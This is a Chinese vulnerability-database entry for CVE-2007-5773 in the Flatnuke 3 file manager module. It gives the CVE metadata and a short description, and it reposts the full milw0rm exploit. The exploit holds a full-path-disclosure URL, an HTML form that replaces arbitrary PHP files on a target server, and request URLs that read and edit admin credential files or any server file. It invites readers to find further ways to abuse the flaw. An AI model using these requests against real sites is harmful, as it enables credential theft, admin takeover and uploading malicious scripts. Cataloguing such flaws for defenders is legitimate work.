Flatnuke index.php 跨站请求伪造漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1113847 漏洞类型 跨站请求伪造
发布时间 2007-10-23 更新时间 2007-11-02
CVE编号 CVE-2007-5773 CNNVD-ID CNNVD-200711-014
漏洞平台 PHP CVSS评分 4.3
|漏洞来源
https://www.exploit-db.com/exploits/4561
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200711-014
|漏洞详情
Flatnuke3版本的文件管理器模块的index.php中存在跨站请求伪造漏洞。远程攻击者可以借助包含dir参数的路径名和ffile参数的文件名的请求,执行某些管理员的操作。
|漏洞EXP
---------------------------------------------------------------
 ____            __________         __             ____  __   
/_   | ____     |__\_____  \  _____/  |_          /_   |/  |_ 
 |   |/    \    |  | _(__  <_/ ___\   __\  ______  |   \   __\
 |   |   |  \   |  |/       \  \___|  |   /_____/  |   ||  |  
 |___|___|  /\__|  /______  /\___  >__|            |___||__|  
          \/\______|      \/     \/                         
---------------------------------------------------------------

Http://www.inj3ct-it.org 	     Staff[at]inj3ct-it[dot]org 

---------------------------------------------------------------

Flatnuke 3 Remote Command Execution / Privilege Escalation

---------------------------------------------------------------

#By KiNgOfThEwOrLd

---------------------------------------------------------------
Corrupted Module: File Manager
---------------------------------------------------------------
PoC:

Flatnuke doesn't use any database, so the registred users informations 
are located in a php file like 
/flatnuke3/misc/fndatabase/users/username.php . By the file manager 
module, the administrator, can upload, make, edit or delete some files, 
only while he's logging in. By the way, making a post whit the same 
request of that module, we can replace or edit a file, for example an 
user profile. So, there are a lot of way to exploit this vulnerability, 
we can edit the admin credentials, we can upload a malicious php script, 
and much more... But to exploit this vulnerability, we need to know the 
script path. We can get it generating a full path disclosure. 


---------------------------------------------------------------
Full Path Disclosure Example:

http://[target]/[flatnuke3_path]/index.php?mod=[forum_path]&op=disc&argumentname=[a_casual_char]
---------------------------------------------------------------
File Replace Exploit:

<form method="post" action="http://[target]/[flatnuke3_path]/index.php?mod=none_filemanager&op="><textarea id="body" name="body" cols="90" rows="35">
</textarea><br><input value="Save" type="submit"><input type="reset">
<input name="opmod" value="save" type="hidden">
<input name="ffile" value="[file_name].php" type="hidden">
<input name="dir" value="/[script_path]/[file_path]" type="hidden"><input class="button" onclick="history.back()" value="Annulla" type="button"></form>
---------------------------------------------------------------
User Credential View/Edit Exploit:

http://[target]/[flatnuke3_path]/index.php?mod=none_filemanager&dir=/[script_path]/[flatnuke3_path]/misc/fndatabase/users/&ffile=[username].php&opmod=open&op=

Or, for example u can view and edit a file located on the server:

http://[target]/[flatnuke3_path]/index.php?mod=none_filemanager&dir=/[script_path]/&ffile=[file]&opmod=open&op=
---------------------------------------------------------------
Do you wanna another way to exploit this vuln? Use your brain! :P
---------------------------------------------------------------

# milw0rm.com [2007-10-23]
|参考资料

来源:XF
名称:flatnuke3-filemanager-security-bypass(37413)
链接:http://xforce.iss.net/xforce/xfdb/37413
来源:MILW0RM
名称:4561
链接:http://www.milw0rm.com/exploits/4561
来源:OSVDB
名称:43635
链接:http://osvdb.org/43635